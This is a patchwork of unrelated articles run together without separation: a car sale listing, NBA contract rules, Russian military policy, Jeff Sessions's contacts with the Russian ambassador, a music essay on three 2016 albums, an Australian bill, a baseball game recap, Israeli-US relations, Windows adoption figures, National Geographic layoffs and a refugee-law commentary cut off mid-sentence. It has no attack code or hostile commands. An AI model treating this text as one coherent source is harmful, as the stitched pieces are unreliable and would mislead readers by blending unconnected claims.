Front seats , carpets and headliner have all been replaced , but the rear parcel shelf area appears to have been left alone . The seller mentions some A/C components are installed under the rear parcel shelf , but there is no compressor present . The dash shows several large cracks poking out from beneath the carpeted pad , but everything else appears to be in much better condition . Additionally , seat adjusters ( fore , aft and tilt ) , window winders and door latch/lock assemblies all work smoothly .
This car 's 1.9 liter four has been converted to use a Weber carb , and in doing so lost the funky intake tube it was originally equipped with . The seller has been using the car as a delivery vehicle for their Motorcycle/ATV parts business and says that it 's proven very fun and reliable . Brakes have been redone front and rear and suspension components are said to be in good shape .
While not as practical as an MGB GT or as quick as a 240Z , these mini-Vettes are still plenty of fun and not nearly as obvious a choice as either of those two . This one looks like a big winner .
A new rule in the NBA 's collective-bargaining agreement means that if Okaro White is to be sent to the Miami Heat 's developmental-league affiliate this season it would have to be as a member of the Heat or not at all .
In a rule limiting how much a team can pay a player who then is released to be moved to a G-League affiliate , the NBA has capped that total at $ 50,000 .
White , who is playing with the Heat 's entry at the Las Vegas summer league , already has been guaranteed $ 226,000 of his $ 1.3 million 2017-18 Heat salary . Because of that , the only way he could be sent to the Sioux Falls Skyforce for seasoning would be as a member of the Heat 's 15-player NBA roster . White also has been guaranteed too much to be converted to a two-way contract .
It is a significant change in the previous policy of bringing players to training camp on partial guarantees and then moving them on to G-League affiliates without having them count against the 15-player NBA limit .
The Heat last year guaranteed $ 100,000 to both Keith Benson and Stefan Jankovic before moving them to their developmental-league affiliate .
Teams this season can also sign up to two players to two-way contracts , allowing such players to appear with their NBA team for up to 45 days , while not counting against the 15-player NBA roster limit or NBA salary cap . Those contracts max out at $ 275,000 , with such players not allowed to receive more than $ 50,000 in guaranteed money prior to the start of the season .
Heat President Pat Riley said the team already is formulating a list of potential two-way prospects . It is possible summer-camp prospects London Perrantes and Matt Williams could be among the candidates .
`` I do think there 's a possibility maybe this week or after that we might sign one , '' Riley said . `` There 's only been six players thus far that have signed two-way contracts , so that 's not many . I think teams are taking a look at it to see , to make sure they get somebody really good and not just to give it to anybody . ''
The Heat had interest in Vanderbilt outside-shooting big man Luke Kornet , who instead signed such a deal with the New York Knicks .
`` I think Luke got his right out off the bat , '' Riley said . `` We liked him after the workout here , but we did n't step up .
`` So we 'll see . We 're going to probably use it . But we want to make sure we get a very good prospect . ''
CAPTION Spoelstra : No need to show anger to appease outsiders . Spoelstra : No need to show anger to appease outsiders . CAPTION Spoelstra : No need to show anger to appease outsiders . Spoelstra : No need to show anger to appease outsiders . CAPTION Dwyane Wade : Braids a tribute to Iverson Dwyane Wade : Braids a tribute to Iverson CAPTION Miami Heat head coach Erik Spoelstra says his team showed grit in loss to the Phoenix Suns . Miami Heat head coach Erik Spoelstra says his team showed grit in loss to the Phoenix Suns . CAPTION Miami Heat guard Dwyane Wade says his team 's loss to the Phoenix Suns hurt his team and their hopes of getting to the playoffs . Miami Heat guard Dwyane Wade says his team 's loss to the Phoenix Suns hurt his team and their hopes of getting to the playoffs . CAPTION Miami guard Josh Richardson talks about the obstacles that lead hs team 's loss to the Phoenix Suns . Miami guard Josh Richardson talks about the obstacles that lead hs team 's loss to the Phoenix Suns .
iwinderman @ sunsentinel.com . Follow him at twitter.com/iraheatbeat or facebook.com/ira.winderman
For daily Heat mailbag go to sun-sentinel.com/askira
Russian President Vladimir Putin took personal control of his country 's Military-Industrial Commission on Wednesday , saying Russia needed to respond quickly to mounting `` threats '' at a time of heightening tensions with NATO over Ukraine .
While a wobbly five-day old ceasefire in eastern Ukraine has raised hopes that the worst may be over in that conflict , the rhetoric from the Kremlin – like the pointed words spoken at last week 's NATO summit in Wales – makes clear that the broader standoff between Russia and the West is only just beginning .
`` There are a lot of new threats appearing . As you know , not long ago , a decision was taken on building up NATO forces in Eastern Europe , '' Mr. Putin told a meeting to discuss a planned $ 560-billion ( U.S. ) overhaul of Russia 's military over the next 12 years . In remarks released by the Kremlin , he accused NATO of trying to start a new arms race and said Russia , while reticent , was `` forced – absolutely forced – to take appropriate measures in response . ''
Story continues below advertisement
Mr. Putin said maintaining Russia 's nuclear deterrent would remain core to Russia 's defence strategy . `` First of all , we are talking about creating a rational series of assault capabilities , including maintaining a guaranteed solution to the task of nuclear deterrence , '' he said .
Hours before Mr. Putin spoke , Russia announced a successful test of a submarine-launched Bulava intercontinental ballistic missile , which is capable of carrying a nuclear warhead . It was the first test of a Bulava since a failed launch last year .
Mr. Putin 's remarks came five days after NATO announced the creation of a `` spearhead force '' of several thousand soldiers that would be able to deploy to Eastern Europe on 48 hours ' notice . NATO leaders who gathered in Wales condemned Moscow 's interference in Ukraine and declared they would be their willing to defend any member state , including the former Soviet republics of Estonia , Latvia and Lithuania , from Russian aggression .
The United States , Canada and the European Union have also hit Russia with escalating sanctions – including a ban on arms sales – as punishment for its intervention in Ukraine . Moscow , infuriated by the February ouster of its ally Viktor Yanukovych , annexed the Crimea Peninsula in March and continues to back anti-government militias in the southeastern regions of Donetsk and Lugansk .
By assuming control of the Military-Industrial Commission , Mr. Putin has taken on the challenge of reviving Russia 's once-mighty defence industry at a time when it 's cut off from Western technologies . In effect , he has become the sole arbiter of how much Russia 's military should pay to which defence company for which type of armament .
The move fits a pattern evident throughout Mr. Putin 's 15 years as Russia 's president or prime minister , which has seen him accumulate more power for himself whenever he perceives the country to be in crisis . Deputy Prime Minister Dmitry Rogozin , a firebrand nationalist who previously headed the commission – and frequently made provocative announcements about defence industry decisions via his Twitter account – was demoted to deputy chairman .
`` From now on , everybody will complain directly to Mr. Putin , and he will make unique decisions , '' said Alexander Golts , a Moscow-based military analyst and deputy editor of an online news site .
Story continues below advertisement
Story continues below advertisement
Moscow has also warned that it will adjust its defence doctrine in response to the NATO deployments . Mr. Golts said the new doctrine would likely identify Western-backed popular uprisings – which is how the Kremlin views the revolt that toppled Mr. Yanukovych – as a new type of `` warfare '' that Russia must be prepared to defend against .
Some Russian generals have called for the United States and NATO to be explicitly named as enemies of Russia in the new doctrine , though Mr. Golts said it was unlikely the Kremlin would go that far .
The fighting in southeastern Ukraine has largely calmed – despite accusations of breaches by both sides – since the Friday announcement of a ceasefire that was crafted by Mr. Putin . Ukrainian President Petro Poroshenko said Wednesday that he was willing to offer greater autonomy to the battle-scarred regions , a promise that falls far short of the rebels ' demand for full independence .
Prior to the ceasefire , Mr. Poroshenko accused Russian troops of having directly invaded Ukraine to support the rebels , leading to a string of rapid reversals on the battlefield just as the insurgents had seemed on the verge of defeat . On Wednesday , Mr. Poroshenko told an audience in Kiev that 70 per cent of the Russian forces in Ukraine had left since the announcement of the ceasefire . `` This gives more reason to hope that the peace initiatives have a future , '' he said .
However , foreign-policy experts in Moscow believe the fighting in Ukraine will soon restart and that it is now too late for any kind of peace that aims to keep the country united . Mr. Putin has spoken of the possibility of `` statehood '' for southeastern Ukraine , a region he has repeatedly referred to as `` Novorossiya , '' or `` New Russia . ''
Donald Trump 's attorney general , Jeff Sessions , twice spoke with the Russian ambassador to the United States during the presidential campaign .
The Washington Post , citing justice department officials , first reported that Sessions met with the Russian ambassador , Sergey Kislyak , once in September 2016 , when US intelligence officials were investigating Russian interference in the presidential election , and once in the summer of that year .
It was communications with Kislyak that led to the firing of Trump 's first national security adviser , Michael Flynn , in February .
A spokeswoman for Sessions confirmed that the meetings took place , but provided a statement from the attorney general saying they were not related to the election campaign .
“ I never met with any Russian officials to discuss issues of the campaign , ” Sessions 's statement said . “ I have no idea what this allegation is about . It is false . ”
Sessions reiterated on Thursday morning that he had “ not met with any Russians at any time to discuss any political campaign ” , in an interview with MSNBC 's Morning Joe .
Sessions , a former senator from Alabama who was among Trump 's early and most vocal surrogates on the campaign trail , did not disclose the conversations when asked under oath during his Senate confirmation hearing in early 2017 about possible contacts between Trump 's campaign and Moscow .
Nancy Pelosi , the House Democratic leader , called for Sessions 's resignation . “ After lying under oath to Congress about his own communications with the Russians , the attorney general must resign , ” she said .
“ Sessions is not fit to serve as the top law enforcement officer of our country and must resign . There must be an independent , bipartisan , outside commission to investigate the Trump political , personal and financial connections to the Russians . ”
The White House swiftly rejected the reports as an effort to undermine Trump 's speech before Congress on Tuesday night , which was reviewed favourably by the US media despite signalling no substantive shift in policy .
“ This is the latest attack against the Trump administration by partisan Democrats , ” a senior administration official said , according to CNN .
“ Sessions met with the ambassador in an official capacity as a member of the Senate armed services committee , which is entirely consistent with his testimony . ”
When Sessions was asked during his 10 January testimony to the Senate judiciary committee how he would respond if he learned of communications between the Trump campaign and Russian officials leading up to the election , he said he was “ not aware of any of those activities ” .
He added : “ I have been called a surrogate at a time or two in that campaign and I did not have communications with the Russians . ”
While the committee was considering his nomination , the panel 's top Democrat , Senator Patrick Leahy , also raised the issue of communications with Russia in a written questionnaire .
“ Several of the president-elect 's nominees or senior advisers have Russian ties , ” Leahy wrote , before asking Sessions point-blank : “ Have you been in contact with anyone connected to any part of the Russian government about the 2016 election , either before or after election day ? ”
“ No , ” Sessions responded .
Sarah Isgur Flores , a spokeswoman for Sessions , denied he had deceived the Senate . “ There was absolutely nothing misleading about his answer , ” Flores said in a statement , noting Sessions had more than 25 conversations with foreign ambassadors last year .
“ He was asked during the hearing about communications between Russia and the Trump campaign – not about meetings he took as a senator and a member of the armed services committee . ”
The Washington Post said it had asked all 26 members of the committee whether they had met Kislyak last year . None of the 20 who replied , including committee chair John McCain , had done so , it reported .
Adam Schiff , the top Democrat on the House intelligence committee , called for Sessions to recuse himself from any investigation into contacts between the Trump campaign and Russia .
“ If reports are accurate that Attorney General Sessions – a prominent surrogate for Donald Trump – met with Ambassador Kislyak during the campaign , and failed to disclose this fact during his confirmation , it is essential that he recuse himself from any role in the investigation of Trump campaign ties to the Russians , ” Schiff said .
“ This is not even a close call ; it is a must . ”
Asked by MSBNC on Thursday whether he would recuse himself from any investigations , Sessions said : “ Well I have said whenever it is appropriate I will recuse myself , there 's no doubt about that . ”
See the full visual
Elijah Cummings , the ranking Democrat on the House oversight committee , issued a statement calling for Sessions 's “ immediate ” resignation .
“ It is inconceivable that even after Michael Flynn was fired for concealing his conversations with the Russians that Attorney General Sessions would keep his own conversations secret for several more weeks , ” Cummings said , adding Sessions 's testimony was “ demonstrably false ” .
“ Yet he let it stand for weeks – and he continued to let it stand even as he watched the president tell the entire nation he did n't know anything about anyone advising his campaign talking to the Russians . ”
The revelation comes just two weeks after the resignation of Michael Flynn , who served as Trump 's national security advisor until it was revealed he discussed US sanctions against Russia with Kislyak in December and misled Vice-President Mike Pence about the nature of his communications .
As the new attorney general , Sessions will have significant oversight of an investigation by the FBI into Russia 's role in the US election and any links to associates of Trump . The Senate and House intelligence committees are each conducting their own separate inquiries into the matter .
Senator Lindsey Graham , a Republican from South Carolina , said Sessions should recuse himself from the FBI investigation .
“ If there is something there , and it goes up the chain of investigation , it is clear to me that Jeff Sessions , who is my dear friend , can not make this decision about Trump , ” Graham said during a joint CNN townhall with Senator McCain late on Wednesday .
Most Republicans have resisted calls to have an independent , select panel investigation the issue , arguing that the intelligence committees can be trusted to oversee the inquiries that were launched shortly after US officials accused Russia of meddling in the American election . But Democrats have called into question whether Trump 's own party , which controls both chambers of Congress , will conduct a fair and thorough investigation .
The Minnesota senator Al Franken , the Democrat who raised the issue of possible ties between Trump 's campaign and the Russians in Sessions ' confirmation hearing , also called on the attorney general to recuse himself from any ongoing investigation .
Franken said : “ I am very troubled that his response to my questioning during his confirmation hearing was , at best , misleading .
“ The American people deserve to know the truth about what happened between Russia and the Trump team … It 's clearer than ever now that the attorney general can not , in good faith , oversee an investigation at the department of justice and the FBI of the Trump-Russia connection , and he must recuse himself immediately . ”
Trump 's friendly posture toward Russia has sounded alarms across the US and frequently proved a source of consternation among members of his own party .
The president has routinely praised his Russian counterpart , Vladimir Putin . Following his victory in November , Trump nominated Rex Tillerson as his secretary of state – a former CEO of ExxonMobil with close ties to Russia .
Trump 's administration has also refused to categorically rule out lifting sanctions imposed against Russia by the Obama administration , prompting bipartisan efforts to ratify those sanctions into law .
Advertisement
Some of the most powerful visions of blackness we 've seen in 2016 have been of death . Black bodies being shot , denigrated , violated . This is n't new . Black citizens in the US have been historically brutalised and mistreated , but it 's only now that we can see the footage minutes after it 's happened and immediately hear the blood-curdling accounts .
As if to counter this , some of the best black music of the year has been accompanied by equally powerful , but more autonomous , visions . Beyoncé 's tightly cornrowed hair , ears adorned with rings . Dev Hynes , in a hoodie and basketball shorts , being driven around New York City . And , most recently , Solange , her limbs tangled amongst those of other black women , eyelids framed with purple eyeshadow , pupils trained on the viewer .
Beyoncé 's ‘ Formation ' .
The albums that these images come from ­– Lemonade , Freetown Sound and A Seat at the Table , respectively — work as a sort of inadvertent trilogy , linked in the way they present unique and varied portraits of modern blackness , queerness and femininity . These are three works that do n't compromise complex identity in service of finding broad audiences .
–
Diverse Black Voices
Black women and queer black people have long been erased from film . There 's a section in a bell hooks essay where she quotes a black female cinema-goer : “ I could always get pleasure from movies as long as I did not look too deep ” . It 's a relatable sentiment for any marginalised person — if you look too long at something that you 've been erased from , it 's easy to feel disenfranchised , forgotten .
The visual accompaniments for Lemonade , Freetown Sound and A Seat at the Table allow marginalised spectators to look , and look deep , at images of queer identity and black womanhood that have rarely been allowed to enter the mainstream . The albums themselves are n't particularly connected sonically , but the visuals — Beyoncé 's Lemonade film and Blood Orange and Solange 's music videos — share the same universe .
This is a world where black people populate the foreground of the frame rather than the background , where everything is shot with a soft film grain and deep , bright colours .
The depiction of black people in these films is often easy and warm , representations of black identity created by black artists for black viewers , rather than to be commodified for white audiences . Less Dreamgirls and more Do The Right Thing .
As As has been amply discussed , Beyoncé 's Lemonade , released in April this year , deftly looks at the way the actions and lives of black men manifest in black female identities . Beyoncé 's rage and sadness brought upon by her partner 's alleged infidelity is incisively mirrored with the sadness of the mothers of slain black men . It allows black women the same artistic catharsis that white audiences have had for decades .
Lemonade is , above all , a celebration of black femininity and power . The message is clear : black women will no longer be your objects . It is not only a diverse project but a truthful one — rather than serve audiences with the same stereotypes of black women that still populate mass culture , Beyoncé presents black women as they are , as she 's known them to be . It 's a common theme in all three projects — representation is n't just a buzzword for these artists , it 's a fact of life .
Freetown Sound — the third album by NYC-via-London musician Dev Hynes — was released a few months after Lemonade , but seems to have been created with similar intent . It 's a paean to diverse representations of blackness like Lemonade . The album is , in Hynes ' words , “ for everyone told they 're not black enough , too black , too queer , not queer in the right way ” , and it shows .
Often , Hynes writes from a female perspective , as on ‘ Better Than Me ' . Sometimes , such as on lead single ‘ Augustine ' , he sings from a queer perspective , rewriting Saint Augustine 's work from this angle . More often than not , ( and most notably on the chilling , beautiful ‘ Hands Up ' ) Hynes presents like a guardian angel , speaking directly to an unseen ‘ you ' , providing advice and solace in a world that 's unfriendly to any kind of otherness .
Freetown Sound celebrates fluid identities and diversity . Halfway through the album , when Hynes begins to chant “ you are special in your own way ” — a classic primary school style anti-bullying platitude — it sounds genuine and heartfelt simply because of the way so many marginalised voices have been fit into the record . The statement becomes more truism than affirmation .
Freetown feels spiritually tied to A Seat at the Table and Lemonade in the way it sees healing and self-love as a political act . It 's not charged with the anger that say , Kendrick Lamar 's To Pimp A Butterfly is — instead , all three albums are quietly revolutionary through their refusal to pander to non-black audiences .
Where Lemonade and Freetown Sound address the world , A Seat at the Table looks inward . It 's a quiet , powerful work ; a piece of art about self-care and knowing yourself , about how simultaneously difficult and beautiful life can be . The album draws its title from a Langston Hughes poem titled draws its title from a Langston Hughes poem titled ‘ I , Too ' , in which Hughes looks towards the end of racial inequality in America . It makes sense that Solange would find her album title in this poem , specifically : it , like the record , is about healing and patience , rather than violence or rage .
This finds Solange in a much darker place than on her 2012 EP True . There she dealt with the aftermath of a breakup ; on A Seat at the Table , she grapples with the systemic racism and violence present in the US , with the quiet but potent incidents of bigotry that she 's experienced her whole life .
Like Beyoncé and Blood Orange , she embraces and celebrates blackness in all forms , and is even more explicit in asserting the album 's status as a work for black people . On ‘ F.U.B.U ' ( an acronym for ‘ For Us , By Us ' ) , she says this to the listener : “ play this song and sing it on your terms / this shit is for us ” .
Solange 's ‘ Cranes In The Sky ' video .
Solange draws from a diverse range of black experiences through mining the sounds of recent black history . Its interludes are narrated by Chicago legend Master P and Solange 's parents . It draws from traditional styles like soul and jazz , but reaches further in finding modern sounds from the Diaspora : you can trace , for example , the earthy mysticism of ‘ Weary ' from A Seat at the Table through to Afro-Cuban duo Ibeyi 's ‘ River ' , which in turn reaches back to sounds and concepts derived from Yoruba prayer rituals .
Instead of cheapening the experience of the album , this patchwork of black voices feels beautiful and reverential — much like Lemonade and Freetown Sound , A Seat at the Table finds its unique voice through channelling the voices of others .
–
A Physical Journey
This method of reclaiming and reinventing black sounds in this way is present on all three records , but is most explicit on Lemonade . The entire album feels like it 's cycling through black genres that have been appropriated : bluegrass on ‘ Daddy Lessons ' ; gospel and rap on ‘ Freedom ' ; reggae on ‘ All Night ' ; and bounce on ‘ Formation ' .
On ‘ Do n't Hurt Yourself ' , blues and rock music is snatched back from white men by the genres ' progenitors , African Americans . ‘ Do n't Hurt Yourself ' also uses a Led Zeppelin sample , and it 's hard not to see its usage as a taunt to anyone who dares suggest Lemonade is less artistically valid than traditional ‘ rock music ' .
It 's a similar move to the one Hynes makes on Freetown Sound track ‘ E.V.P . ' That song finds Hynes duetting about appropriation with Blondie lead singer Debbie Harry , the lead singer of a band with a history of using black styles . The whole album works as a reimagined history of ‘ 80s pop , playing with the light funk and airy production of that era .
There 's a distinct sense of time and place present on each of the albums , lending each work scale and depth . This geographical and historical specificity allows each of the albums to tap into the collective identity of each setting . Freetown Sound is the most wide-reaching : it traces Hynes ' parents from Freetown , Sierra Leone , to predominantly black South London , before jumping to Hynes ' life in New York . New York City is a huge feature of Hynes ' identity as blood orange , and on Freetown the reasoning for this comes into full view through the way the record presents the city .
Through the album , as Hynes explores different identities and subcultures , he finds that , for him , New York is exactly the cosmopolitan dream that everyone 's made it out to be , a place of safety where there 's no ‘ correct ' way to be black or queer .
Lemonade is practically a tour of the Deep South . ‘ Daddy Lessons ' name-checks Texas , ‘ Yonce 's hometown , while ‘ Formation 's production echoes New Orleans bounce and features samples of Big Freedia , a modern icon of the subgenre . ‘ All Night ' is built around a piece of ‘ Spottieottiedopaliscious ' by Outkast , kings of Atlanta hip-hop . Each homage is a reminder of the brilliance of Southern black musicians .
But the southern states still have some of the highest black incarceration rates in America , and you can feel that too in ‘ Freedom 's rage , in the way ‘ Forward ' breaks down to a state of desolation at its peak . Beyoncé may live in LA , but the suffocating heat and malaise of the South comes through ; the constant battle between black excellence and tragedy .
Solange 's record resides in the South too , but she finds herself looking toward places with much darker histories than her sister . Solange worked on the album on a former sugarcane plantation in New Iberia , Louisiana — a town in which her maternal grandparents lived until leaving due to racially motivated attacks . You can feel the same warmth on A Seat at the Table as on Lemonade , but it 's more still than fiery . There 's an emptiness to it , an isolation that you can hear on some of the more skeletal tracks like ‘ Scales ' and ‘ Do n't Wish Me Well ' . While she rarely alludes to it , every song on A Seat at the Table carries the historical weight of New Iberia , the scars of slavery and racial violence .
–
The Accidental Trilogy
If you listen to these works together , the narrative begins with Freetown Sound , with Ashlee Haze and hope and promise . We travel through Freetown and London and settle in New York , lush and rich and welcoming , exploring the subways , the subcultures . But the glamour wears off eventually .
We travel south , to the territory of Lemonade , to the heat and sweat , a land populated with dried up plantations and systemically brutalised young men , with defiant and powerful women . There is rage and violence here , but eventually there 's peace . We end up in New Orleans , and find solidarity there . First in the bounce clubs of ‘ Formation ' and eventually in quiet New Iberia , the domain of A Seat at the Table . Time passes . We learn how to care , how to control the fury , how to accept it and , more importantly , how to channel it into beauty .
Beyoncé 's Lemonade .
These albums may present us with hyper-stylised fantasies of the world , but they 're imbued with deeply real and deeply true depictions of black experience . They 're not protest records ; instead they politicise the everyday , exposing the fraught systems and quiet hardships that people of colour have to deal with daily .
None are prescriptive ; all three records encourage and celebrate true diversity and , in this individuality , find collective identity . This embrace of diverse beauty and quiet activism recalls the closing lines of ‘ I , Too ' : “ They 'll see how beautiful I am / And be ashamed— / I , too , am America . ”
–
The bill was introduced into Parliament last November and sent to a committee in February . After conducting public hearings around the country and attracting almost 200 public submissions , the committee is due to deliver its report on August 10 .
Sources say the committee will back the bill despite strong concerns from the Health Department .
In its submission to the committee , the department said the bill would set up a new regulatory system that would create `` complexity and uncertainty '' and potentially clash with the Therapeutic Goods Act .
Department secretary Martin Bowles warned the bill left important legal and practical issues unidentified or unresolved , `` leading to the risk of regulatory gap , overlapping laws and a lack of clarity about the exercise of jurisdiction by agencies and possible inconsistency with other existing laws '' .
The department also warns the bill could contravene some of Australia 's international obligations under the Single Convention on Narcotic Drugs .
Dylan Cozens launched his way into history , but he still did n't quite catch up with his teammate in the Minor League home run race . That did n't matter at all Wednesday night .
Philadelphia 's No . 7 prospect delivered the first three-homer game of his career , plating a professional-best seven runs in the process , as Double-A Reading routed Bowie , 13-0 , at FirstEnergy Stadium .
Cozens started with a solo shot over the wall in left-center field in the first inning . The 22-year-old outfielder wasted little time in picking up his second with another solo long ball , this one to right-center , in the third . After hitting into a force out in the fourth , he completed the home run hat trick in the sixth with a three-run homer to right-center .
An inning later , Cozens capped his night with a two-run triple to right . That established his new career high in RBIs , besting the six he compiled on June 11 .
`` Pretty happy to be honest , '' Cozens said of his day . `` When you homer in your first at-bat , it 's usually gon na be a good day no matter what , especially if you get the win as well . I just consistently put the bat on the ball today and made hard contact . It just happened to turn it into three homers and a triple . ''
Even still , he trails teammate Rhys Hoskins by one for the Minor League lead as Philly 's No . 13 prospect went yard to left in the third . The duo is the first teammates in the Eastern League with 30 homers apiece since Ron Kittle and Randy Johnson for the Glenns Falls White Sox in 1981 .
`` That 's a big reason we 're doing so well as a team , '' Cozens said . `` Teams sometimes , they just got ta pick which one they want to come after . Sometimes we both make them pay or one of us makes them pay . A big bat like that in the lineup besides me , it 's a lot of fun .
`` I do n't really care about [ eclipsing Hoskins ] , to be honest . It 's good to have a good night . I would n't say it 's a huge important thing to lead the Minor Leagues in home runs , I 'm more focused on trying to lead the Major Leagues in home runs one day . The Major Leagues is on the top of my list right now . ''
Overall , Cozens is batting .282 and is tied with Hoskins for the league lead in RBIs with 96 . The Arizona native also paces the circuit with a .962 OPS .
`` I 'm continuing to try to get better every day and it 's showing through the season , '' he said . `` I 'm learning how to make the right adjustments the more and more I play . ''
Tom Eschelman improved to 3-2 after giving up three hits and fanning five over six innings for the Fightin Phils .
Israeli Prime Minister Benjamin Netanyahu stated that he appreciated Trump 's `` deep friendship '' for Israel and his `` declared willingness to fight against radical Islamic terror with full force . ''
MOSCOW ( Sputnik ) — Israeli Prime Minister Benjamin Netanyahu said he will hold the first telephone call with new US President Donald Trump to discuss the Iranian `` threat '' , the Israeli-Palestinian issue and the situation in Syria on Sunday evening .
Netanyahu noted at Sunday 's cabinet meeting that he appreciated Trump 's `` deep friendship '' for Israel and his `` declared willingness to fight against radical Islamic terror with full force '' , according to the Jerusalem Post newspaper .
`` I want to make clear that , as opposed to some reports that I read , stopping the Iranian threat – first and foremost , stopping the threat forgotten by the signing of the bad agreement with Iran — continues to be the supreme objective of the state of Israel , '' Netanyahu said , as quoted by the newspaper .
© REUTERS / Lucas Jackson Trump Can Not Do Much to Dismantle Iran Nuclear Deal - President Rouhani
On Saturday , Netanyahu posted a two-and-a-half minute video address , in which he announced the upcoming conversation with Trump and urged to place the issue of countering the Iranian regime `` which calls for Israel 's destruction '' on the international agenda .
On Friday , Trump was sworn in as the 45th president of the United States .
A year on from the release of Windows 10 most businesses are still reluctant to adopt the OS , according to research by solutions and managed services company Softchoice .
Based on an evaluation of more than 400,000 Windows-based computing devices between January and May this year , across 169 organizations in the US and Canada using the TechCheck asset management solution , the study reveals less than one percent were running Windows 10 .
It finds the vast majority of North American businesses adopted Windows 7 as the corporate platform-of-choice since moving away from Windows XP , and have yet to move in significant quantities to newer versions Windows 8 or 10 .
`` It appears businesses are hesitant to take advantage of the various Windows 10 upgrades and , at least for now , are satisfied with Windows 7 , '' says David Brisbois , Softchoice 's senior manager of assessment and technology deployment services consulting . `` Historically , OS upgrades have been viewed as major time and resource-consuming undertakings , and this may be influencing the decision today to hold off on Windows 10 '' .
The findings show that 91 percent of machines were running on Windows 7 ( an increase of 18 percent over the same period in 2015 ) . A worrying five percent were still on Windows XP ( a decrease of 20 percent from the same period in 2015 ) . Four percent were on Windows 8 ( up two percent from 2015 ) .
It 's also larger businesses that are most reluctant to move . Softchoice 's analysis finds enterprises still had the largest deployment of Windows XP . However , there was a 29 percent drop in the OS from 2015 to 2016 .
You can find out more about TechCheck on the Softchoice website .
Photo credit : chrisdorney and tanuha2001 / Shutterstock
By John Prager / addictinginfo.org via filmsforaction.org
When news broke that Rupert Murdoch , evil overlord of Fox News , had purchased National Geographic , it sent shockwaves of panic through thinking individuals everywhere . After all , National Geographic has traditionally been one of the most well-known sources of scientific information , and Fox News is where any semblance of scientific knowledge goes to be beaten mercilessly with socks full of pennies before being unceremoniously dumped in a vat full of acid in Bill O'Reilly 's basement for easy disposal .
While National Geographic promised that there would be no editorial “ meddling ” from 21st Century Fox , Murdoch is already getting involved in other ways — specifically by laying off hundreds of the staff that made the company worth acquiring in the first place .
Staff members — all of them — were ordered into the office on November 3 , unless they were traveling for business , on vacation , or otherwise not there by a rather horrific-sounding e-mail from CEO Gary Knell :
“ To all NGS Staff : “ After very careful and serious consideration , we are ready to communicate how our restructuring and transformation will affect each employee at National Geographic . To that end , please make every effort to be available tomorrow , November 3rd , either in your regular work location , and/or by phone . “ If you are traveling for business , on vacation or plan to be out for any other reason , please notify Tia Freeman-Evans or Yvonne Perry in HR immediately , so we can make alternative plans to get in touch with you . If you know that someone on your staff will be out of the office on November 3rd , please let Tia or Yvonne know by 3 p.m. ( Eastern ) today , as well . “ Please watch your inbox for important information about your employment status tomorrow . “ I can not thank you enough for your patience and hard work over the last few months . I am proud of how our teams and our organization have approached and responded to this transitional period . Looking ahead , I am confident National Geographic 's mission will be fulfilled in powerful , new and impactful ways , as we continue to change the world through science , exploration , education and storytelling . Gary ”
Then , the staff waited , one by one , to be called into Human Resources to learn their fates . “ No one knows how many will be axed today , ” an unnamed source inside National Geographic told News Photographer magazine Tuesday . “ The staff is sitting by their phones , waiting to be called down to HR. ” Politico reports that , ultimately , about 180 employees — about 9 percent of the workforce — were subject to “ involuntary separation , ” while an undetermined number of employees were offered “ voluntary separation agreements . ”
In a statement , National Geographic shared its side of the story :
The National Geographic Society and the National Geographic Channels are in the process of reorganizing in order to move forward strategically following the closing the NG Partners deal , which is expected to occur in mid-November . The entities combined have about 2,000 employees , and all staff have been advised as to their status as of closing . Involuntary separations will represent about 9 % of the overall workforce reduction , many in shared services and a voluntary separation offer has also been made to eligible employees .
Sherry Brukbacher , a photo editor who had been working in her department since 2008 , confirmed she was one of those eliminated by the merger :
Also axed were pictured editor Kim Hubbard , 28-year veteran picture editor Nancy Lee Ott , photographer Michael Nichols , and numerous others . “ Among those who were the first to be let go on Tuesday morning , according to our source , was also one of the magazine 's top picture editors and one of the magazine 's page designers who – according to several photographers – was ‘ the best designer ' on staff , NPPA notes .
“ The CEO of National Geographic Society , Greg Knell , tried to claim back in September that there “ there wo n't be an [ editorial ] turn in a direction that is different form the National Geographic heritage , ” Nathaniel Downes of Reverb Press wrote of the layoffs Tuesday . “ Murdoch 's move today only served to prove Knell 's words hollow , with hundreds of talented people now served their pink slips . And with the recognition that Murdoch 's other enterprises do not reflect the standards held by National Geographic , and with Murdoch 's history of changing the editorial direction of purchased properties , today 's move indicates that we can expect a similar shift for National Geographic . ”
One must wonder how National Geographic can maintain editorial control when many of those who were “ separated ” from the company were editors and other decision-makers . Will we soon be seeing headlines like “ Global Warming : The Great Scam of the Century ” and “ Who Needs Polar Bears , Anyway ” gracing the once-reputable publication ? Only time will tell — but this sudden layoff of a large percentage of the staff does not bode well for any who were holding out hope that the Fox merger would not permanently damage the integrity of National Geographic .
Featured Image via Pinterest/Wikimedia Common
On Monday , President Obama denounced Republicans , including Ted Cruz and Jeb Bush , who suggested that the U.S. should admit Christian refugees fleeing persecution in Syria , but not Muslims from the same country . Obama called such a “ religious test ” “ shameful ” and “ not American. ” Today he doubled down , asserting that Republicans who object to resettling tens or hundreds of thousands of Islamic refugees from Syria in the U.S. are helping ISIS .
President Obama apparently is unaware of the controlling federal law , or maybe he just does n't care what the law says . It would n't be the first time . Andy McCarthy tries to set Obama straight :
In his latest harangue against Senator Ted Cruz ( R. , Texas ) and other Americans opposed to his insistence on continuing to import thousands of Muslim refugees from Syria and other parts of the jihad-ravaged Middle East , Obama declaimed : When I hear political leaders suggesting that there would be a religious test for which a person who 's fleeing from a war-torn country is admitted … that 's shameful… . That 's not American . That 's not who we are . We do n't have religious tests to our compassion . Really ? Under federal law , the executive branch is expressly required to take religion into account in determining who is granted asylum . Under the provision governing asylum ( section 1158 of Title 8 , U.S. Code ) , an alien applying for admission must establish that … religion [ among other things ] … was or will be at least one central reason for persecuting the applicant . Moreover , to qualify for asylum in the United States , the applicant must be a “ refugee ” as defined by federal law . That definition ( set forth in Section 1101 ( a ) ( 42 ) ( A ) of Title , U.S. Code ) also requires the executive branch to take account of the alien 's religion : The term “ refugee ” means ( A ) any person who is outside any country of such person 's nationality … and who is unable or unwilling to return to … that country because of persecution or a well-founded fear of persecution on account of … religion [ among other things ] … [ . ] The law requires a “ religious test. ” And the reason for that is obvious . Asylum law is not a reflection of the incumbent president 's personal ( and rather eccentric ) sense of compassion . Asylum is a discretionary national act of compassion that is directed , by law not whim , to address persecution . There is no right to emigrate to the United States . And the fact that one comes from a country or territory ravaged by war does not , by itself , make one an asylum candidate . … In the case of this war , the Islamic State is undeniably persecuting Christians . It is doing so , moreover , as a matter of doctrine . Even those Christians the Islamic State does not kill , it otherwise persecutes as called for by its construction of sharia ( observe , for example , the ongoing rape 